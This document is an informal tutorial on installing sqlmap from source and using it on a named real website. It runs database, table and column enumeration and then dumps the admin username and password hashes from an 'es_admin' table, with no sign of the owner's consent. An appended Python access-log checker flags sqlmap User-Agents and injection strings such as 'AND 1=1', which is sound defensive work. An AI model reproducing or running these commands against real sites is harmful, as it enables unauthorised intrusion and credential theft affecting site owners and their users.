on penetration testing based linux os like backtrack, backbox and blackbuntu, sqlmap comes already installed.
but you can easily use sqlmap on other systems too :)
how ??? ok follow these steps, it's really not a big deal ;)
sqlmap official website, from where you can download the sqlmap source code
http://sqlmap.org/
download link :-
https://github.com/sqlmapproject/sqlmap/zipball/master
the sqlmap source code is saved with the name master
it's a zip file; to extract its content, run the command
unzip master
you will get a directory named sqlmap project, something like that; enter that directory and list the files
yesssss :) . here is our sqlmap source code .
sqlmap is coded in python and sqlmap.py is the main file which is used for performing SQL injection.
so let's start >:D<
you can run sqlmap.py in 2 ways, either using python or using ./ ;)
python sqlmap.py option
./sqlmap.py option
if sqlmap.py file has execute permission, you can run sqlmap using ./
to list the available options for sqlmap usage, supply the -h option
like this
./sqlmap.py -h
here is the link where you can get the options
https://github.com/sqlmapproject/sqlmap/wiki/Usage
for example, i want to extract the databases of a website vulnerable to sql injection using sqlmap
website link is http://www.iapex.com.pk/messages.php?id=4
command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 --dbs
here -u stands for the sql injection vulnerable url
--dbs stands for databases \ ^_^ /
as soon as you run this command, sqlmap will start injecting this url and will extract the database names
after completion of the process, you will get results like this
now, if you want to get the list of tables in a database, you will need to specify the database name
./sqlmap.py -u website.com/vulnerable.php?id=4 -D database_name --tables
in my case i am going for the database named iapexcom_new
so the command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new --tables
here -D stands for the database that has to be enumerated
we have 2 databases, and we can enumerate tables from these databases.
in the above command we are enumerating the table list of database iapexcom_new
after completion of the process, sqlmap will show the list of tables under the database
and so on :)
as we know
a database has tables and every table has columns.
columns contain information/data
so when performing sql injection using sqlmap, first we extract the database names, then the list of tables from that database
after extracting the table names, we select a table and extract the list of columns in that table
and then we can get the information stored in the columns
let's extract columns from a table of the database ;)
i am going for table es_admin because this table contains columns which have the username and password of the website admin stored in them :P
./sqlmap.py -u website.com/vulnerable.php?id=4 -D database_name -T table_name --columns
ok
query will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin --columns
the meaning of this command is
inject a website url (-u) http://www.iapex.com.pk/messages.php?id=4 whose database name (-D) is iapexcom_new and table name (-T) is es_admin, and extract the names of the columns from the table
wait a few minutes until sqlmap extracts the column names from table es_admin
it will show result like this
ok now we have the column names too, let's go and extract the data stored in these columns :P
the command will be
./sqlmap.py -u website.com/vulnerable.php?id=4 -D database_name -T table_name -C column_name --dump
command in my case
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin -C username,password --dump
after the process completes you will get a result like this
you are done >:D<, and you can see the username and password hash which are stored in table 'es_admin' in the columns named username and password
this is how you can use sqlmap on a linux os where it is not already installed :)
enjoy
Thank you :)
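
on the defending side, the sequence above (--dbs, --tables, --columns, --dump) shows up in the web server's access log as requests to messages.php whose id value is no longer a plain number. the following is an added example, not part of the original post: a python check over constructed log lines. the combined log format, the threshold of 3 and the function name suspicious_clients are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); addresses are from
# documentation ranges and the sqlmap version string is made up.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /messages.php?id=4 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /messages.php?id=4a HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [01/Jan/2024:10:01:00 +0000] "GET /messages.php?id=4%27 HTTP/1.1" 500 0 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.23 - - [01/Jan/2024:10:01:01 +0000] "GET /messages.php?id=4%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "GET /messages.php?id=4%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2024:10:02:01 +0000] "GET /messages.php?id=4%20AND%201%3D2 HTTP/1.1" 200 480 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2024:10:02:02 +0000] "GET /messages.php?id=4%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def suspicious_clients(log_text, path="/messages.php", param="id", threshold=3):
    """Map client IP -> evidence for clients probing an integer-only parameter."""
    stats = defaultdict(lambda: {"non_numeric": 0, "sqlmap_ua": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        url = urlsplit(m["target"])
        if url.path != path:
            continue
        entry = stats[m["ip"]]
        # parse_qs percent-decodes, so encoded quotes and spaces are compared decoded.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        entry["non_numeric"] += sum(1 for v in values if not re.fullmatch(r"[0-9]+", v))
        # The default sqlmap User-Agent starts with "sqlmap/"; the header is
        # client-controlled, so it is a supporting signal, not proof either way.
        entry["sqlmap_ua"] |= m["ua"].lower().startswith("sqlmap/")
    # Report a client on a tool User-Agent or on repeated non-numeric values.
    return {ip: e for ip, e in stats.items()
            if e["sqlmap_ua"] or e["non_numeric"] >= threshold}


if __name__ == "__main__":
    for ip, evidence in suspicious_clients(SAMPLE_LOG).items():
        print(ip, evidence)
```

a single odd value (like the id=4a line) stays below the threshold, so a typo by a normal visitor is not reported.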